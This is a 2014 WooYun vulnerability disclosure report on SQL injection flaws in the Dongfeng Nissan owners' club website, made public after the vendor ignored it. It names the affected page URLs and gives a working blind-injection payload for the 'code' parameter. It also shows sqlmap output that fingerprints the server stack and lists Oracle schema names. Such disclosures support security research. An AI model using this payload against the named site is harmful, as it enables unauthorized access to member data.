Vulnerability summary

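Bug ID: wooyun-2014-076533

Title: Multiple SQL injection vulnerabilities in the Dongfeng Nissan official club

Vendor: dfyb.com

Author: Vigoss_Z

Submitted: 2014-09-19 11:26

Fix time: 2014-09-24 11:28

Disclosed: 2014-09-24 11:28

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: The vendor has been notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]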

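Vulnerability details

Disclosure status:

2014-09-19: Details reported to the vendor; awaiting vendor response
2014-09-24: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

As the title says.

Detailed description:

Official member club; its profile states: more than 2.5 million members
Multiple injection vulnerabilities
Password recovery page: http://nclub.dongfeng-nissan.com.cn/MemberNew/FindPassWord.aspx
Activity information: http://owners.dongfeng-nissan.com.cn/MemberNew/ActivityDetail.aspx?code=ACTOPV130131R5133*&type=4
26 databases: the run was not finished, this only proves the issue:

Proof of vulnerability: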

sqlmap identified the following injection points with a total of 90 HTTP(s) requests:
---
Place: GET
Parameter: code
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=ACTOPV130302I1600' AND 7060=7060 AND 'fRhn'='fRhn&type=4
---
[INFO] testing MySQL
[WARNING] the back-end DBMS is not MySQL
[INFO] testing Oracle
[INFO] confirming Oracle
[INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Oracle
[WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[INFO] fetching database (schema) names
[INFO] fetching number of databases
[WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[INFO] retrieved: 26
[INFO] retrieved: APEX_030200
[INFO] retrieved: APP
[INFO] retrieved: APPQOSSYS
[INFO] retrieved: CTXSYS
[INFO] retrieved: DBSNMP
[INFO] retrieved: DCRM
[INFO] retrieved: EXFSYS
[INFO] retrieved: FLOWS_030000
[INFO] retrieved: FLOWS_FILES
[INFO] retrieved: MDSYS
[INFO] retrieved: OLAPSYS

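Fix:

Copyright notice: please credit the source when reposting: Vigoss_Z@WooYun


Vulnerability response

Vendor response:

Severity: No impact (ignored by vendor)

Ignored at: 2014-09-24 11:28

Vendor reply:

Latest status:

None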